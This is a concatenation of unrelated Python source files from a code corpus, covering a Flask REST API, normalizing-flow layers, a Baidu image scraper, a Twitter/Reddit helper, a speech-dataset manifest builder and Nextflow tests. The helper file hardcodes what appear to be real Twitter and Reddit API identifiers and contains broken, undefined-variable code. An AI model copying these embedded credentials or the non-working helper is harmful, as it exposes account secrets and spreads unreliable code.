Checks for the validity of bundle columns
representing uncertainty. Returns 4
boolean pd.Series that represent
where to index to replace values.
"""
has_se = (~df['standard_error'].isnull()) & (df['standard_error'] > 0)
LOG.info(f"{sum(has_se)} rows have standard error.")
has_ui = (~df['lower'].isnull()) & (~df['upper'].isnull())
LOG.info(f"{sum(has_ui)} rows have uncertainty.")
has_ess = (~df['effective_sample_size'].isnull()) & (df['effective_sample_size'] > 0)
LOG.info(f"{sum(has_ess)} rows have effective sample size.")
has_ss = (~df['sample_size'].isnull()) & (df['sample_size'] > 0)
LOG.info(f"{sum(has_ss)} rows have sample size.")
if sum(has_se | has_ui | has_ess | has_ss) < len(df):
raise ValueError("Some rows have no valid uncertainty.")
return has_se, has_ui, has_ess, has_ss
def stdev_from_crosswalk_version(crosswalk_version):
"""
Takes a crosswalk version data frame and figures out the standard deviation
from what is included in the bundle.
There are other functions that will still use the bounds_to_stdev
function rather than this because they're not dealing with
crosswalk versions. This function should only be used for crosswalk versions.
We prefer standard deviation (has_se), then uncertainty intervals (has_ui),
then effective sample size (has_es), then sample size (has_ss).
Args:
crosswalk_version (pd.DataFrame)
Returns:
"""
df = crosswalk_version.copy()
standard_error = df['standard_error'].copy()
has_se, has_ui, has_ess, has_ss = check_crosswalk_version_uncertainty_columns(df)
replace_ess_with_ss = ~has_ess & has_ss
LOG.info(f"{sum(replace_ess_with_ss)} rows will have their effective sample size filled by sample size.")
replace_se_with_ui = ~has_se & has_ui
LOG.info(f"{sum(replace_se_with_ui)} rows will have their standard error filled by uncertainty intervals.")
replace_se_with_ess = ~has_se & ~has_ui
LOG.info(f"{sum(replace_se_with_ess)} rows will have their standard error filled by effective sample size.")
# Replace effective sample size with sample size
df.loc[replace_ess_with_ss, 'effective_sample_size'] = df.loc[replace_ess_with_ss, 'sample_size']
# Calculate standard deviation different ways (also
stdev_from_bounds = bounds_to_stdev(lower=df['lower'], upper=df['upper'])
stdev_from_es = ess_to_stdev(mean=df['mean'], ess=df['effective_sample_size'])
# Check to see if the UI was bad to begin with, then go to ESS
bad_ui = stdev_from_bounds <= 0
replace_se_with_ess = replace_se_with_ess | (replace_se_with_ui & bad_ui)
# Use boolean arrays representing the pecking order to replacing standard error
standard_error[replace_se_with_ui] = stdev_from_bounds[replace_se_with_ui]
standard_error[replace_se_with_ess] = stdev_from_es[replace_se_with_ess]
# Do a final check on standard error
if ((standard_error <= 0) | standard_error.isnull()).any():
LOG.error("There are unrepairable negative or null values for standard error in the bundle.")
return standard_error
| StarcoderdataPython |
1914739 | #! /usr/bin/env python3
import json
from flask import Flask, jsonify
from flask_restful import Resource, Api, reqparse, abort
from db import TopicList, Topic
from playhouse.shortcuts import model_to_dict
import logging
logger = logging.getLogger("peewee")
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
app = Flask(__name__)
api = Api(app)
class HelloWorld(Resource):
def get(self):
return {"hello": "world"}
class TopicLists(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument("page", type=int, required=False, default=1)
self.reqparse.add_argument("per", type=int, required=False, default=10)
super().__init__()
def get(self):
args = self.reqparse.parse_args()
topic_lists = [
model_to_dict(list)
for list in TopicList.select().paginate(args["page"], args["per"])
]
meta = {"count": TopicList.select().count()}
return jsonify({"topic_lists": topic_lists, "meta": meta})
class SingleTopic(Resource):
def get(self, topic_id):
try:
topic = Topic.get(Topic.topic_id == topic_id)
topic_dict = model_to_dict(topic)
topic_dict["images"] = topic_dict["images"].split(",")
return jsonify(topic_dict)
except:
abort(404, message="Topic id {} is not found".format(topic_id))
api.add_resource(HelloWorld, "/")
api.add_resource(SingleTopic, "/api/topics/<int:topic_id>")
api.add_resource(TopicLists, "/api/topic_lists")
if __name__ == "__main__":
app.run(debug=True)
| StarcoderdataPython |
8058642 | from typing import *
from .. import tensor as T
from ..layers import is_jit_layer
from ..tensor import Tensor, Module, split, concat
from .core import *
__all__ = [
'SplitFlow', 'SplitFlow1d', 'SplitFlow2d', 'SplitFlow3d',
]
class SplitFlow(Flow):
"""
A flow which splits input `x` into halves, apply different flows on each
half, then concat the output together.
Basically, a :class:`SplitFlow` performs the following transformation::
x1, x2 = split(x, axis=axis, section=sections)
y1, log_det1 = left(x1)
if right is not None:
y2, log_det2 = right(x2)
else:
y2, log_det2 = x2, 0.
y = concat([y1, y2], axis=axis)
log_det = log_det1 + log_det2
"""
__constants__ = Flow.__constants__ + (
'x_sections', 'x_axis', 'y_sections', 'y_axis',
)
left: Module
right: Module
x_sections: List[int]
x_axis: int
y_sections: List[int]
y_axis: int
def __init__(self,
x_sections: Sequence[int],
left: Flow,
right: Optional[Flow] = None,
y_sections: Optional[Sequence[int]] = None,
x_axis: int = -1,
y_axis: Optional[int] = None):
"""
Construct a new :class:`SplitFlow`.
Args:
x_sections: The size of each sections of the splitted `x` along
`x_axis`.
left : The `left` flow (see above).
right: The `right` flow (see above).
`right.x_event_ndims` must equal to `left.x_event_ndims`, and
`right.y_event_ndims` must equal to `left.y_event_ndims`.
If not specified, the right flow will be identity.
Must be specified if `left.x_event_ndims != left.y_event_ndims`.
y_sections: The size of each sections of the splitted `y` along
`y_axis`. Defaults to be the same as `x_sections`.
x_axis: Along which axis to split or join `x`.
y_axis: Along which axis to split or join `y`.
If not specified, use `x_axis`.
Must be specified if `left.x_event_ndims != left.y_event_ndims`.
"""
# validate the arguments
if len(x_sections) != 2 or any(s < 1 for s in x_sections):
raise ValueError(f'`x_sections` must be a sequence of '
f'two positive integers: got {y_sections!r}.')
x_sections = list(map(int, x_sections))
x_axis = int(x_axis)
if y_sections is None:
y_sections = x_sections
else:
if len(y_sections) != 2 or any(s < 1 for s in y_sections):
raise ValueError(f'`y_sections` must be None or a sequence of '
f'two positive integers: got {y_sections!r}.')
y_sections = list(map(int, y_sections))
if not isinstance(left, Flow) and not is_jit_layer(left):
raise TypeError(f'`left` is not a flow: got {left!r}.')
x_event_ndims = left.get_x_event_ndims()
y_event_ndims = left.get_y_event_ndims()
if right is not None:
if not isinstance(right, Flow) and not is_jit_layer(right):
raise TypeError(f'`right` is not a flow: got {right!r}.')
if right.get_x_event_ndims() != x_event_ndims or \
right.get_y_event_ndims() != y_event_ndims:
raise ValueError(
f'`left` and `right` flows must have same `x_event_ndims` '
f'and `y_event_ndims`: '
f'got `left.x_event_ndims` == {left.get_x_event_ndims()!r}, '
f'`left.y_event_ndims` == {left.get_y_event_ndims()}, '
f'`right.x_event_ndims` == {right.get_x_event_ndims()}, '
f'and `right.y_event_ndims` == {right.get_y_event_ndims()}.'
)
if x_event_ndims != y_event_ndims:
if y_axis is None:
raise ValueError('`x_event_ndims` != `y_event_ndims`, thus '
'`y_axis` must be specified.')
if right is None:
raise ValueError('`x_event_ndims` != `y_event_ndims`, thus '
'`right` must be specified.')
else:
if y_axis is None:
y_axis = x_axis
else:
y_axis = int(y_axis)
super(SplitFlow, self).__init__(
x_event_ndims=x_event_ndims,
y_event_ndims=y_event_ndims,
explicitly_invertible=True,
)
self.left = left
self.right = right
self.x_sections = x_sections
self.x_axis = x_axis
self.y_sections = y_sections
self.y_axis = y_axis
def _transform(self,
input: Tensor,
input_log_det: Optional[Tensor],
inverse: bool,
compute_log_det: bool
) -> Tuple[Tensor, Optional[Tensor]]:
sections: List[int] = []
if inverse:
sections.extend(self.y_sections)
axis = self.y_axis
join_axis = self.x_axis
else:
sections.extend(self.x_sections)
axis = self.x_axis
join_axis = self.y_axis
out_left, out_right = split(input, sections=sections, axis=axis)
out_left, output_log_det = self.left(
input=out_left, input_log_det=input_log_det, inverse=inverse,
compute_log_det=compute_log_det,
)
if self.right is not None:
out_right, output_log_det = self.right(
input=out_right, input_log_det=output_log_det, inverse=inverse,
compute_log_det=compute_log_det,
)
output = concat([out_left, out_right], axis=join_axis)
return output, output_log_det
class SplitFlowNd(SplitFlow):
def __init__(self,
x_sections: Sequence[int],
left: Flow,
right: Optional[Flow] = None,
y_sections: Optional[Sequence[int]] = None):
"""
Construct a new convolutional split flow.
Args:
x_sections: The size of each sections of the splitted `x` along
the channel axis.
left : The `left` flow.
right: The `right` flow.
y_sections: The size of each sections of the splitted `y` along
the channel axis. Defaults to be the same as `x_sections`.
"""
spatial_ndims = self._get_spatial_ndims()
feature_axis = -1 if T.IS_CHANNEL_LAST else -(spatial_ndims + 1)
event_ndims = spatial_ndims + 1
for arg_name, arg in [('left', left), ('right', right)]:
# type error deferred to the base class, thus we only check
# the event ndims if `arg` looks like a flow.
if arg is not None and hasattr(arg, 'x_event_ndims'):
if arg.get_x_event_ndims() != event_ndims or \
arg.get_y_event_ndims() != event_ndims:
raise ValueError(
f'The `x_event_ndims` and `y_event_ndims` of '
f'`{arg_name}` are required to be {event_ndims}: '
f'got `x_event_ndims` == {arg.get_x_event_ndims()}, '
f'and `y_event_ndims` == {arg.get_y_event_ndims()}.'
)
super().__init__(
x_sections=x_sections,
left=left,
right=right,
y_sections=y_sections,
x_axis=feature_axis,
y_axis=feature_axis,
)
def _get_spatial_ndims(self) -> int:
raise NotImplementedError()
class SplitFlow1d(SplitFlowNd):
"""
A flow which splits the channel axis of 1D convolutional `x` into halves,
apply different 1D convolutional flows on each half, then concat the
output together.
"""
def _get_spatial_ndims(self) -> int:
return 1
class SplitFlow2d(SplitFlowNd):
"""
A flow which splits the channel axis of 2D convolutional `x` into halves,
apply different 2D convolutional flows on each half, then concat the
output together.
"""
def _get_spatial_ndims(self) -> int:
return 2
class SplitFlow3d(SplitFlowNd):
"""
A flow which splits the channel axis of 3D convolutional `x` into halves,
apply different 3D convolutional flows on each half, then concat the
output together.
"""
def _get_spatial_ndims(self) -> int:
return 3
| StarcoderdataPython |
11366393 | <reponame>hopper-maker/openxc-python<filename>openxc/sinks/notifier.py
"""A data sink implementation for the core listener notification service of
:class:`openxc.vehicle.Vehicle`.
"""
from threading import Thread
from collections import defaultdict
import logging
from openxc.measurements import Measurement, UnrecognizedMeasurementError
from .queued import QueuedSink
LOG = logging.getLogger(__name__)
class MeasurementNotifierSink(QueuedSink):
"""Notify previously registered callbacks whenever measurements of a certian
type have been received.
This data sink is the core of the asynchronous interface of
:class:`openxc.vehicle.Vehicle.`
"""
def __init__(self):
super(MeasurementNotifierSink, self).__init__()
self.callbacks = defaultdict(set)
self.notifier = self.Notifier(self.queue, self._propagate)
def register(self, measurement_class, callback):
"""Call the ``callback`` with any new values of ``measurement_class``
received.
"""
self.callbacks[Measurement.name_from_class(measurement_class)
].add(callback)
def unregister(self, measurement_class, callback):
"""Stop notifying ``callback`` of new values of ``measurement_class``.
If the callback wasn't previously registered, this method will have no
effect.
"""
self.callbacks[Measurement.name_from_class(measurement_class)
].remove(callback)
def _propagate(self, measurement, **kwargs):
measurement_callbacks = self.callbacks[measurement.name]
measurement_callbacks.update(self.callbacks[Measurement.name])
for callback in measurement_callbacks:
try:
callback(measurement, **kwargs)
except TypeError:
callback(measurement)
class Notifier(Thread):
def __init__(self, queue, callback):
super(MeasurementNotifierSink.Notifier, self).__init__()
self.daemon = True
self.queue = queue
self.callback = callback
self.start()
def run(self):
while True:
message, kwargs = self.queue.get()
try:
measurement = Measurement.from_dict(message)
self.callback(measurement, **kwargs)
self.queue.task_done()
except UnrecognizedMeasurementError as e:
LOG.warn(e)
| StarcoderdataPython |
9789276 | # Generated by Django 2.0.1 on 2019-01-13 18:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app01', '0030_customerjavascript'),
]
operations = [
migrations.DeleteModel(
name='CustomerJavaScript',
),
]
| StarcoderdataPython |
3397560 | <filename>2017.DigitalImageProcessing/FaceRecognition/crawler/crawler/spiders/imagespider.py
# -*- coding: utf-8 -*-
import os
import time
import scrapy
import twisted
from selenium import webdriver
from crawler.items import ImageItem
class BaiduImageSpider(scrapy.Spider):
name = "BaiduImageSpider"
allowed_domains = ["baidu.com"]
download_delay = 1
def __init__(self, keyword="lena", number="100", *args, **kwargs):
super(BaiduImageSpider, self).__init__(*args, **kwargs)
# init arguments
self.keyword = keyword
self.number = int(number)
# init webdriver
path = os.path.join("tools", "phantomjs")
self.driver = webdriver.PhantomJS(path)
def start_requests(self):
urls = [
r"https://image.baidu.com/search/index?tn=baiduimage&word={}"\
.format(self.keyword),
]
for url in urls:
yield scrapy.Request(url = url, callback = self.parse, errback = self.error)
def parse(self, response):
self.logger.info("start parsing")
self.driver.get(response.url)
# find n images
xpath = r'//*[@id="imgid"]/div[*]/ul/li[*]/div[*]/a/img[@data-imgurl]'
n = self.number
i = 0
while i < n:
# count images
elems = self.driver.find_elements_by_xpath(xpath)
# update i
if i != len(elems): i = len(elems)
else: break
# scroll down
actions = webdriver.ActionChains(self.driver)
actions.move_to_element(elems[-1])
actions.perform()
time.sleep(0.5)
self.logger.info("found {} image(s)".format(i))
# save images
item = ImageItem()
if elems:
item["image_urls"] = [elem.get_attribute("data-imgurl") for elem in elems]
item["images"] = ["{}{:04}{}".format(self.keyword, i, os.path.splitext(x)[1])\
for i,x in enumerate(item["image_urls"])]
self.logger.info("start downloading")
return item
# errors from downloader
def error(self, failure):
self.logger.error(repr(failure))
# References:
#
# [Scrapy: Logging]
# (https://doc.scrapy.org/en/latest/topics/logging.html)
# [PhantomJS]
# (http://phantomjs.org/download.html)
# [selenium with scrapy for dynamic page]
# (https://stackoverflow.com/a/17979285)
# [XPath Syntax]
# (https://www.w3schools.com/xml/xpath_syntax.asp)
# [Scroll down to bottom of infinite page with PhantomJS in Python]
# (https://stackoverflow.com/a/28928684)
# [Scrapy: Spider arguments]
# (https://doc.scrapy.org/en/latest/topics/spiders.html#spider-arguments)
# [Scrapy: Using errbacks to catch exceptions in request processing]
# (https://doc.scrapy.org/en/latest/topics/request-response.html#topics-request-response-ref-errbacks)
# [Crawling with Scrapy – Download Images]
# (http://www.scrapingauthority.com/scrapy-download-images/)
# [scrapy-3 利用框架,抓取图片]
# (https://my.oschina.net/jastme/blog/280114)
# [Getting index of item while processing a list using map in python]
# (https://stackoverflow.com/a/5432789) | StarcoderdataPython |
25182 | <filename>helper.py
import requests
import pandas as pd
import tweepy #for twitter
import os
from bs4 import BeautifulSoup
import praw #for reddit
import requests
import requests.auth
def getTweets(search_terms=['counterfeit','amazonHelp']):
consumer_key = '6CM1Yqk0Qz6KUXsDQUS8xmahS'
consumer_secret = '<KEY>'
access_token = '<KEY>'
access_token_secret = '<KEY>'
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
cfit_tweets = api.search(q=search_terms, count=1000)
df = pd.DataFrame()
df['text'] = [x.text for x in cfit_tweets]
df['source'] = ['twitter: "counterfiet, amazonelp"' for x in cfit_tweets]
df['url'] = [x.text[x.text.find('http'):].split('\n')[0] for x in cfit_tweets]
df['retweets'] = [x.retweet_count for x in cfit_tweets]
df['favorites'] = [x.favorite_count for x in cfit_tweets]
df['iframe'] = ['https://twitframe.com/show?url=https://twitter.com/{}/status/{}'.format(x.user.screen_name, x.id) for x in cfit_tweets]
keys = ['t'+str(x) for x in range(len(df['iframe'].tolist()))]
values = df['iframe'].tolist()
return dict(zip(keys, values))
def getReddits():
'''
#1. Get Token
client_auth = requests.auth.HTTPBasicAuth('BXTDVNZqv8SFyw', '<KEY>')
post_data = {"grant_type": "password", "username": "whs2k", "password": "<PASSWORD>"}
headers = {"User-Agent": "ChangeMeClient/0.1 by YourUsername"}
response = requests.post("https://www.reddit.com/api/v1/access_token", auth=client_auth, data=post_data, headers=headers)
#response.json()
#2. Use Token
headers = {"Authorization": "bearer <KEY>", "User-Agent": "ChangeMeClient/0.1 by YourUsername"}
response = requests.get("https://oauth.reddit.com/api/v1/me", headers=headers)
#response.json()
'''
reddit = praw.Reddit(client_id='BXTDVNZqv8SFyw',
client_secret='<KEY>',
password='<PASSWORD>',
user_agent='testscript by /u/whs2k',
username='whs2k')
if reddit.read_only:
print('We Are Connected to Reddit!')
#search terms controversial, gilded, hot, new, rising, top'''
png_urls = [x.url for x in reddit.subreddit('FulfillmentByAmazon').new(limit=1000) if '.png' in x.url]
print('We have {} png urls'.format(len(png_urls)))
keys = ['<KEY>) for x in range(len(df['iframe'].tolist()))]
return dict(zip(keys, png_urls))
def getTweetsDF():
consumer_key = '<KEY>'
consumer_secret = '<KEY>'
access_token = '<KEY>'
access_token_secret = '<KEY>'
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
cfit_tweets = api.search(q=['counterfeit','amazonHelp'], count=1000)
fake_tweets = api.search(q=['fake','amazonHelp'], count=1000)
df = pd.DataFrame()
df['text'] = [x.text for x in cfit_tweets]
df['source'] = ['twitter: "counterfiet, amazonelp"' for x in cfit_tweets]
df['url'] = [x.text[x.text.find('http'):].split('\n')[0] for x in cfit_tweets]
df['retweets'] = [x.retweet_count for x in cfit_tweets]
df['favorites'] = [x.favorite_count for x in cfit_tweets]
df['iframe'] = ['https://twitframe.com/show?url=https://twitter.com/{}/status/{}'.format(x.user.screen_name, x.id) for x in cfit_tweets]
df1 = pd.DataFrame()
df1['text'] = [x.text for x in fake_tweets]
df1['source'] = ['twitter: "fake, amazonHelp"' for x in fake_tweets]
df1['url'] = [x.text[x.text.find('http'):].split('\n')[0] for x in fake_tweets]
df1['retweets'] = [x.retweet_count for x in fake_tweets]
df1['favorites'] = [x.favorite_count for x in fake_tweets]
df1['iframe'] = ['https://twitframe.com/show?url=https://twitter.com/{}/status/{}'.format(x.user.screen_name, x.id) for x in fake_tweets]
df_final = df.append(df1)
df_final.sort_values('retweets',ascending=False).drop_duplicates(['text','source']).reset_index().head(50)
keys = ['t1', 't2']
keys = ['t'+str(x) for x in range(len(df1['iframe'].tolist()))]
values = df1['iframe'].tolist()
return dict(zip(keys, values))
| StarcoderdataPython |
1835929 | from utils import (number_to_digits,
digits_to_number,
is_palindrome,
capacity)
MAX_ITERATIONS_COUNT = 50
def lychrel(number: int) -> bool:
for _ in range(MAX_ITERATIONS_COUNT):
number += digits_to_number(reversed(list(number_to_digits(number))))
if is_palindrome(str(number)):
return False
return True
assert not lychrel(47)
assert not lychrel(349)
assert lychrel(196)
assert capacity(filter(lychrel, range(1, 10_000))) == 249
| StarcoderdataPython |
4828173 | bicycles = ['trek', 'cannondale', 'redline', 'specialized']
message = f"My first bicycle was a {bicycles[0].title()}"
print (message)
| StarcoderdataPython |
3206168 | <reponame>aprilnovak/openmc<gh_stars>0
from openmc.examples import slab_mg
from tests.testing_harness import PyAPITestHarness
def test_mg_survival_biasing():
model = slab_mg()
model.settings.survival_biasing = True
harness = PyAPITestHarness('statepoint.10.h5', model)
harness.main()
| StarcoderdataPython |
8186244 | <reponame>Sebaestschjin/advent-of-code<filename>year2020/day22/reader.py
from pathlib import Path
def read(filename='in'):
file_path = Path(__file__).parent / filename
with file_path.open('r') as file:
return read_lines(file.readlines())
def read_lines(lines):
first, second = ''.join(lines).split('\n\n')
return read_deck(first), read_deck(second)
def read_deck(lines):
return [int(card) for card in lines.strip().split('\n')[1:]]
| StarcoderdataPython |
12852477 | <filename>src/backend/hacker_gif_poll/graphql_api/tenor/queries/hacker_gif.py<gh_stars>0
# Base imports
from os import environ
# Third party imports
from graphene import Field, ObjectType, String, Int
# Project imports
from graphql_api.tenor.schemas.hacker_gif.result import Result
from graphql_api.tenor.resolvers.hacker_gif import resolve_hacker_gifs
API_KEY = environ.get('TENOR_API_KEY')
class HackerGifQuery(ObjectType):
hacker_gifs = Field(
Result,
key=String(default_value=API_KEY),
limit=Int(default_value=20),
query=String(default_value='hacker'),
resolver=resolve_hacker_gifs
)
| StarcoderdataPython |
1817616 | """
Prepare manifest files for speech recognition with OTS FRF_ASR001 dataset.
Author:
* <NAME>, 2022-01-24
"""
import os
import json
import csv
import logging
import random
from pathlib import Path
from speechbrain.utils.data_utils import get_all_files
from speechbrain.dataio.dataio import read_audio
logger = logging.getLogger(__name__)
SAMPLERATE = 16000 # 16000 for FRF_ASR003
SEED = 1234
RATIO = '8:1:1'
def prepare_frf_asr003(
data_folder, ext, save_train, save_valid, save_test):
wav_list = sorted(get_all_files(data_folder, match_and=[".wav"]))
trans_list = sorted(get_all_files(data_folder, match_and=[".txt"]))
trans_list = [f for f in trans_list if '_orig' not in f]
assert len(wav_list) == len(trans_list), "audio and text does not match!"
# randomize wav list
random.seed(SEED)
random.shuffle(wav_list)
# get percentage from ratio
ratio = [int(r) for r in RATIO.split(':')]
percent = {}
percent['train'] = float(ratio[0]) / sum(ratio)
percent['valid'] = float(ratio[1]) / sum(ratio)
percent['test'] = float(ratio[2]) / sum(ratio)
# get the split wav lists
nwavs = len(wav_list)
wav_list_train = sorted(wav_list[:int(nwavs*percent['train'])])
wav_list_valid = sorted(wav_list[int(nwavs*percent['train']):int(nwavs*(percent['train']+percent['valid']))])
wav_list_test = sorted(wav_list[int(nwavs*(percent['train']+percent['valid'])):])
if ext == 'json':
# create the json files 3 datasets
create_json(wav_list_train, save_train)
create_json(wav_list_valid, save_valid)
create_json(wav_list_test, save_test)
# create the json file for all datasets together
save_all = save_train.replace('train', 'all')
create_json(sorted(wav_list), save_all)
elif ext == 'csv':
# create the csv files for 3 datasets
create_csv(wav_list_train, save_train)
create_csv(wav_list_valid, save_valid)
create_csv(wav_list_test, save_test)
# create the csv file for all datasets together
save_all = save_train.replace('train', 'all')
create_csv(sorted(wav_list), save_all)
def create_json(wav_list, json_file):
json_dict = {}
for wav_file in wav_list:
# Reading the signal (to retrieve duration in seconds)
signal = read_audio(wav_file)
duration = signal.shape[0] / SAMPLERATE
# Reading the transcription
trans_file = wav_file.replace(".wav", ".txt")
assert os.path.isfile(trans_file), "{} not exist".format(trans_file)
trans = open(trans_file).readlines()[0]
# Manipulate path to get relative path and uttid
path_parts = wav_file.split(os.path.sep)
uttid, _ = os.path.splitext(path_parts[-1])
relative_path = os.path.join("{data_root}", *path_parts[-2:])
# Create entry for this utterance
json_dict[uttid] = {
"wav": relative_path,
"length": duration,
"words": trans,
}
# Writing the dictionary to the json file
with open(json_file, mode="w") as json_f:
json.dump(json_dict, json_f, ensure_ascii=False, indent=2)
logger.info(f"{json_file} successfully created!")
def create_csv(wav_list, csv_file):
header = ['ID', 'duration', 'wav', 'spk_id', 'wrd']
tuple_list = []
for wav_file in wav_list:
# Reading the signal (to retrieve duration in seconds)
signal = read_audio(wav_file)
duration = signal.shape[0] / SAMPLERATE
# Reading the transcription
trans_file = wav_file.replace(".wav", ".txt")
assert os.path.isfile(trans_file), "{} not exist".format(trans_file)
trans = open(trans_file).readlines()[0]
# Manipulate path to get relative path and uttid
path_parts = wav_file.split(os.path.sep)
uttid, _ = os.path.splitext(path_parts[-1])
spk_id = '_'.join(uttid.split('_')[:-1])
relative_path = os.path.join("$data_root", *path_parts[-2:])
# Create entry for this utterance
tuple_list.append((uttid, str(duration), relative_path, spk_id, trans))
# Writing the tuple list to the csv file
with open(csv_file, 'w', newline='') as f:
csv_out = csv.writer(f)
csv_out.writerow(header)
for i, tpl in enumerate(tuple_list):
csv_out.writerow(list(tpl))
logger.info(f"{csv_file} successfully created!")
if __name__ == '__main__':
dataset = 'FRF_ASR003'
data_folder = '{}/Data/ots_french/{}/sel/'.format(
Path.home(), dataset)
list_folder = '../filelists/ots_french/{}'.format(dataset.lower())
os.makedirs(list_folder, exist_ok=True)
ext = 'csv' # 'json', or 'csv'
save_train = os.path.join(list_folder, 'train.{}'.format(ext))
save_valid = os.path.join(list_folder, 'valid.{}'.format(ext))
save_test = os.path.join(list_folder, 'test.{}'.format(ext))
prepare_frf_asr003(data_folder, ext, save_train, save_valid, save_test)
| StarcoderdataPython |
11232424 | import json
import logging
from ulauncher.api.client.Extension import Extension
from ulauncher.api.client.EventListener import EventListener
from ulauncher.api.shared.event import KeywordQueryEvent
from ulauncher.api.shared.item.ExtensionResultItem import ExtensionResultItem
from ulauncher.api.shared.action.RenderResultListAction import RenderResultListAction
from ulauncher.api.shared.action.CopyToClipboardAction import CopyToClipboardAction
import datetime
logger = logging.getLogger(__name__)
class DemoExtension(Extension):
def __init__(self):
super(DemoExtension, self).__init__()
self.subscribe(KeywordQueryEvent, KeywordQueryEventListener())
class KeywordQueryEventListener(EventListener):
def on_event(self, event, extension):
items = []
logger.info('preferences %s' % json.dumps(extension.preferences))
# data = event.get_data()
# print("my event", event.get_keyword())
# print('{0:%Y-%m-%d}'.format(datetime.datetime.now()))
items.append(ExtensionResultItem(icon='images/icon.png',
name='YYYY-MM-DD',
description='Enter to copy to the clipboard',
on_enter=CopyToClipboardAction('{0:%Y-%m-%d}'.format(datetime.datetime.now()))))
items.append(ExtensionResultItem(icon='images/icon.png',
name='HH:mm',
description='Enter to copy to the clipboard',
on_enter=CopyToClipboardAction(
'{0:%H:%M}'.format(datetime.datetime.now()))))
items.append(ExtensionResultItem(icon='images/icon.png',
name='YYYY-MM-DD HH:mm',
description='Enter to copy to the clipboard',
on_enter=CopyToClipboardAction(
'{0:%Y-%m-%d %H:%M}'.format(datetime.datetime.now()))))
now = datetime.datetime.now()
time_intervals = [
(0, 3), (3, 6), (6, 9), (9, 12), (12, 15), (15, 18), (18, 21), (21,)
]
current_time_interval = ''
for i in time_intervals:
if i[0] == 21:
current_time_interval = '21-24'
break
if i[0] <= now.hour and now.hour < i[1]:
current_time_interval = '{}-{}'.format(i[0], i[1])
break
items.append(ExtensionResultItem(icon='images/icon.png',
name='HH1-HH2',
description='Enter to copy to the clipboard',
on_enter=CopyToClipboardAction(
current_time_interval)))
items.append(ExtensionResultItem(icon='images/icon.png',
name='HH1-HH2: HH:mm',
description='Enter to copy to the clipboard',
on_enter=CopyToClipboardAction(
'%s: %s' % (current_time_interval,'{0:%H:%M}'.format(datetime.datetime.now())))))
return RenderResultListAction(items)
if __name__ == '__main__':
DemoExtension().run()
| StarcoderdataPython |
104696 | # -*- coding: utf-8 -*-
from torch.optim.optimizer import Optimizer
class Optimizers:
def __init__(self, *op: Optimizer):
self.optimizers = op
def zero_grad(self):
for op in self.optimizers:
op.zero_grad()
def step(self):
for op in self.optimizers:
op.step()
| StarcoderdataPython |
3572867 | <reponame>neuroticnerd/django-demo-app
from django.contrib import admin
from . import models
class ActionAdmin(admin.ModelAdmin):
list_display = (
'title', 'created_by', 'created_at', 'modified_by', 'modified_at'
)
list_filter = ('created_by', 'created_at')
fields = ('title', 'description')
readonly_fields = (
'created_by', 'created_at', 'modified_by', 'modified_at'
)
class ActionAssignmentAdmin(admin.ModelAdmin):
list_display = (
'action', 'user', 'created_by', 'created_at',
)
fields = ('action', 'user', 'created_at', 'modified_at')
readonly_fields = (
'created_by', 'modified_by',
)
admin.site.register(models.Action, ActionAdmin)
admin.site.register(models.ActionAssignment, ActionAssignmentAdmin)
| StarcoderdataPython |
8182207 | """
Nextflow error handling and exit code tests.
The test suite runs ``nextflow run prep_riboviz.nf``.
"""
import os.path
import shutil
import tempfile
import yaml
import pytest
import riboviz.test
from riboviz import hisat2
from riboviz import params
from riboviz.test.nextflow import run_nextflow
@pytest.fixture(scope="function")
def tmp_file():
"""
Create a temporary file.
:return: path to temporary file
:rtype: str or unicode
"""
_, tmp_file = tempfile.mkstemp(prefix="tmp", suffix=".yaml")
yield tmp_file
if os.path.exists(tmp_file):
os.remove(tmp_file)
@pytest.fixture(scope="function")
def tmp_dir():
"""
Create a temporary directory.
:return: directory
:rtype: str or unicode
"""
tmp_dir = tempfile.mkdtemp("tmp")
yield tmp_dir
shutil.rmtree(tmp_dir)
def test_no_sample_multiplex_fq_files(tmp_file):
"""
Test that missing :py:const:`riboviz.params.FQ_FILES` and
:py:const:`riboviz.params.MULTIPLEX_FQ_FILES` returns a non-zero
exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.FQ_FILES] = []
config[params.MULTIPLEX_FQ_FILES] = []
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_both_sample_multiplex_fq_files(tmp_file):
"""
Test that providing both :py:const:`riboviz.params.FQ_FILES` and
:py:const:`riboviz.params.MULTIPLEX_FQ_FILES` returns a non-zero
exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
vignette_config = yaml.load(f, yaml.SafeLoader)
config[params.FQ_FILES] = vignette_config[params.FQ_FILES]
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_fq_files_not_found(tmp_file):
"""
Test that non-existent :py:const:`riboviz.params.FQ_FILES` files
raise a non-zero exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
config = yaml.load(f, yaml.SafeLoader)
config[params.FQ_FILES] = {
"foo1": "foo1.fq", "foo2": "foo2.fq"
}
with open(tmp_file, 'w') as f:
yaml.dump(config, f)
exit_code = run_nextflow(tmp_file)
assert exit_code != 0, \
"Unexpected exit code %d" % exit_code
def test_multiplex_fq_files_not_found(tmp_file):
"""
Test that non-existent
:py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
files raise a non-zero exit code.
:param tmp_file: Path to temporary file, to write configuration to
:type tmp_file: str or unicode
"""
with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG, 'r') as f:
